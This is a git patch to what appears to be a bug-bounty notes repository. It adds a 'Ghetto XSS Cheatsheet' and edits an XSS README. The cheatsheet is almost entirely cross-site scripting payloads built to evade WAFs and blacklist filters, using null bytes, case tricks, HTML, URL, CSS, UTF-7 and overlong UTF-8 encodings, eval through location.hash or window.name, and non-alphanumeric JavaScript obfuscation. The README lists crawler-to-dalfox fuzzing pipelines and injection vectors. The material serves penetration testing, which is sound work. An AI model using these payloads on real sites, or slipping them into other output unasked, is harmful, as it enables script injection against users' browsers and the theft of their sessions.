From 07347df5b4aa36c706b07c6141d44c123ad2e636 Mon Sep 17 00:00:00 2001
From: Xalgord <xalgord@gmail.com>
Date: Mon, 28 Aug 2023 17:16:44 +0000
Subject: [PATCH] GITBOOK-84: change request with no subject merged in GitBook

---
 SUMMARY.md               |   1 +
 ghetto-xss-cheatsheet.md | 201 +++++++++++++++++++++++++++++++++++++++
 xss/README.md            |  40 +++++---
 3 files changed, 227 insertions(+), 15 deletions(-)
 create mode 100644 ghetto-xss-cheatsheet.md

diff --git a/SUMMARY.md b/SUMMARY.md
index de7b2ff..3f8e519 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -25,4 +25,5 @@
   * [🔎 How to Get Unique Subdomains on Large scope](recon-strategies-by-other-hackers/how-to-get-unique-subdomains-on-large-scope.md)
 * [🎯 subdomain-enumeration](subdomain-enumeration/README.md)
 * [❌ xss](xss/README.md)
+* [Ghetto XSS Cheatsheet](ghetto-xss-cheatsheet.md)
 * [🚀 Oneliners](oneliners.md)
diff --git a/ghetto-xss-cheatsheet.md b/ghetto-xss-cheatsheet.md
new file mode 100644
index 0000000..ac80600
--- /dev/null
+++ b/ghetto-xss-cheatsheet.md
@@ -0,0 +1,201 @@
+---
+description: 'source: https://d3adend.org/xss/ghettoBypass'
+---
+
+# Ghetto XSS Cheatsheet
+
+```
+ _____ _          _   _          __   _______ _____   _____ _                _       _               _   
+|  __ \ |        | | | |         \ \ / /  ___/  ___| /  __ \ |              | |     | |             | |  
+| |  \/ |__   ___| |_| |_  ___    \ V /\ `--.\ `--.  | /  \/ |__   ___  __ _| |_ ___| |__   ___  ___| |_ 
+| | __| '_ \ / _ \ __| __|/ _ \   /   \ `--. \`--. \ | |   | '_ \ / _ \/ _` | __/ __| '_ \ / _ \/ _ \ __|
+| |_\ \ | | |  __/ |_| |_| (_) | / /^\ |\__/ /\__/ / | \__/\ | | |  __/ (_| | |_\__ \ | | |  __/  __/ |_ 
+ \____/_| |_|\___|\__|\__|\___/  \/   \|____/\____/   \____/_| |_|\___|\__,_|\__|___/_| |_|\___|\___|\__|
+ 
+A ghetto collection of XSS payloads that I find to be useful during penetration tests, especially when faced with WAFs or application-based black-list filtering, but feel free to disagree or shoot your AK-74 in the air.
+                                                                                                        
+Simple character manipulations.  
+Note that I use hexadecimal to represent characters that you probably can't type.  For example, \x00 equals a null byte, but you'll need to encode this properly depending on the context (URL encoding \x00 = %00).
+
+HaRdc0r3 caS3 s3nsit1vITy bYpa55!
+<sCrIpt>alert(1)</ScRipt>
+<iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)>
+
+Null-byte character between HTML attribute name and equal sign (IE, Safari).
+<img src='1' onerror\x00=alert(0) />
+
+Slash character between HTML attribute name and equal sign (IE, Firefox, Chrome, Safari).
+<img src='1' onerror/=alert(0) />
+
+Vertical tab between HTML attribute name and equal sign (IE, Safari).
+<img src='1' onerror\x0b=alert(0) />
+
+Null-byte character between equal sign and JavaScript code (IE).
+<img src='1' onerror=\x00alert(0) />
+
+Null-byte character between characters of HTML attribute names (IE).
+<img src='1' o\x00nerr\x00or=alert(0) />
+
+Null-byte character before characters of HTML element names (IE).
+<\x00img src='1' onerror=alert(0) />
+
+Null-byte character after characters of HTML element names (IE, Safari).
+<script\x00>alert(1)</script>
+
+Null-byte character between characters of HTML element names (IE).
+<i\x00mg src='1' onerror=alert(0) />
+
+Use slashes instead of whitespace (IE, Firefox, Chrome, Safari).
+<img/src='1'/onerror=alert(0)>
+
+Use vertical tabs instead of whitespace (IE, Safari).
+<img\x0bsrc='1'\x0bonerror=alert(0)>
+
+Use quotes instead of whitespace in some situations (Safari).
+<img src='1''onerror='alert(0)'>
+<img src='1'"onerror="alert(0)">
+
+Use null-bytes instead of whitespaces in some situations (IE).
+<img src='1'\x00onerror=alert(0)>
+
+Just don't use spaces (IE, Firefox, Chrome, Safari).
+<img src='1'onerror=alert(0)>
+
+Prefix URI schemes.
+Firefox (\x09, \x0a, \x0d, \x20)
+Chrome (Any character \x01 to \x20)
+<iframe src="\x01javascript:alert(0)"></iframe> <!-- Example for Chrome -->
+
+No greater-than characters needed (IE, Firefox, Chrome, Safari).
+<img src='1' onerror='alert(0)' <
+
+Extra less-than characters (IE, Firefox, Chrome, Safari).
+<<script>alert(0)</script>
+
+Backslash character between expression and opening parenthesis (IE).
+<style>body{background-color:expression\(alert(1))}</style>
+
+JavaScript Escaping
+<script>document.write('<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>');</script>
+
+Encoding Galore.
+
+HTML Attribute Encoding
+<img src="1" onerror="alert(1)" />
+<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />
+<iframe src="javascript:alert(1)"></iframe>
+<iframe src="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;"></iframe>
+
+URL Encoding
+<iframe src="javascript:alert(1)"></iframe>
+<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>
+
+CSS Hexadecimal Encoding (IE specific examples)
+<div style="x:expression(alert(1))">Joker</div>
+<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">Joker</div>
+<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">Joker</div>
+<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">Joker</div>
+
+JavaScript (hexadecimal, octal, and unicode)
+<script>document.write('<img src=1 onerror=alert(1)>');</script>
+<script>document.write('\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E');</script>
+<script>document.write('\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076');</script>
+<script>document.write('\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E');</script>
+
+JavaScript (Decimal char codes)
+<script>document.write('<img src=1 onerror=alert(1)>');</script>
+<script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));</script>
+
+JavaScript (Unicode function and variable names)
+<script>alert(123)</script>
+<script>\u0061\u006C\u0065\u0072\u0074(123)</script>
+
+Overlong UTF-8 (SiteMinder is awesome!)
+< = %C0%BC = %E0%80%BC = %F0%80%80%BC
+> = %C0%BE = %E0%80%BE = %F0%80%80%BE
+' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
+" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
+
+<img src="1" onnerror="alert(1)">
+%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
+
+UTF-7 (Missing charset?)
+<img src="1" onerror="alert(1)" />
++ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
+
+Unicode .NET Ugliness
+<script>alert(1)</script>
+%uff1cscript%uff1ealert(1)%uff1c/script%uff1e
+
+Classic ASP performs some unicode homoglyphic translations... don't ask why...
+<img src="1" onerror="alert('1')">
+%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A
+
+Useless and/or Useful features.
+
+HTML 5 (Not comphrensive)
+<video src="http://www.w3schools.com/html5/movie.ogg" onloadedmetadata="alert(1)" />
+<video src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)" />
+
+Usuage of non-existent elements (IE)
+<blah style="blah:expression(alert(1))" />
+
+CSS Comments (IE)
+<div style="z:exp/*anything*/res/*here*/sion(alert(1))" />
+
+Alternate ways of executing JavaScript functions
+<script>window['alert'](0)</script>
+<script>parent['alert'](1)</script>
+<script>self['alert'](2)</script>
+<script>top['alert'](3)</script>
+
+Split up JavaScript into HTML attributes
+<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
+
+HTML is parsed before JavaScript
+<script>
+var junk = '</script><script>alert(1)</script>';
+</script>
+
+HTML is parsed before CSS
+<style>
+body { background-image:url('http://www.blah.com/</style><script>alert(1)</script>'); }
+</style>
+
+XSS in XML documents [doctype = text/xml] (Firefox, Chrome, Safari).
+<?xml version="1.0" ?>
+<someElement>
+	<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>
+</someElement>
+
+URI Schemes
+<iframe src="javascript:alert(1)"></iframe>
+<iframe src="vbscript:msgbox(1)"></iframe> (IE)
+<iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)
+<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari)
+
+HTTP Parameter Pollution
+http://target.com/something.xxx?a=val1&a=val2
+ASP.NET 	a = val1,val2
+ASP 		a = val1,val2
+JSP 		a = val1
+PHP 		a = val2
+
+Two Stage XSS via fragment identifier (bypass length restrictions / avoid server logging)
+<script>eval(location.hash.slice(1))</script>
+<script>eval(location.hash)</script> (Firefox)
+
+http://target.com/something.jsp?inject=<script>eval(location.hash.slice(1))</script>#alert(1)
+
+Two Stage XSS via name attribute
+<iframe src="http://target.com/something.jsp?inject=<script>eval(name)</script>" name="alert(1)"></iframe>
+
+Non-alphanumeric crazyness...
+<script>
+$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();
+</script>
+
+<script>
+(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()
+</script>
+```
diff --git a/xss/README.md b/xss/README.md
index 90058d3..8177838 100644
--- a/xss/README.md
+++ b/xss/README.md
@@ -1,4 +1,6 @@
-## Get Parameter as much as possible
+# ❌ xss
+
+### Get Parameter as much as possible
 
 1. https://github.com/devanshbatham/ParamSpider
 2. gospider -S tageturls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'|grep "=" | qsreplace -a | dalfox pipe -o result.txt
@@ -9,38 +11,46 @@
 
 Combine all in a file and remove duplicates.
 
-## Run XSS fuzzer
+### Run XSS fuzzer
+
 1. https://github.com/s0md3v/XSStrike
 2. https://github.com/hahwul/dalfox
 
-
 Resources:
-- https://blog.yeswehack.com/yeswerhackers/parameter-discovery-quick-guide-to-start/
-- https://infosecwriteups.com/tale-of-my-first-xss-27f622bc47c0
-<hr>
 
-## dalfox usage:
+* https://blog.yeswehack.com/yeswerhackers/parameter-discovery-quick-guide-to-start/
+* https://infosecwriteups.com/tale-of-my-first-xss-27f622bc47c0
+
+***
+
+### dalfox usage:
+
 ```
 gf xss domain.txt | grep -Eo 'https?://[^\"]+' > domain.txt
 dalfox file domain.txt -w 20 --silence
 ```
 
-<hr>
+***
 
-## another technique to find XSS
+### another technique to find XSS
 
-- Scrape all urls from the domain using gau
-- then sort the result using grep command: `cat url.txt | grep “utm_”`
-- do testing
+* Scrape all urls from the domain using gau
+* then sort the result using grep command: `cat url.txt | grep “utm_”`
+* do testing
 
 resources:
-- https://santoshdbobade.medium.com/how-i-got-reflected-cross-site-scripting-rxss-on-manchester-metropolitan-university-700b36cb4f53
 
+* https://santoshdbobade.medium.com/how-i-got-reflected-cross-site-scripting-rxss-on-manchester-metropolitan-university-700b36cb4f53
 
-<hr>
+***
+
+### Custom useful XSS Attack Vectors
 
-## Custom useful XSS Attack Vectors
 ```
 testing"><img/src=x onerror=alert(/XSS/)//
 testing'-alert(2)-'xss
 ```
+
+Encoding Bypass:
+
+[https://d3adend.org/xss/ghettoBypass](https://d3adend.org/xss/ghettoBypass)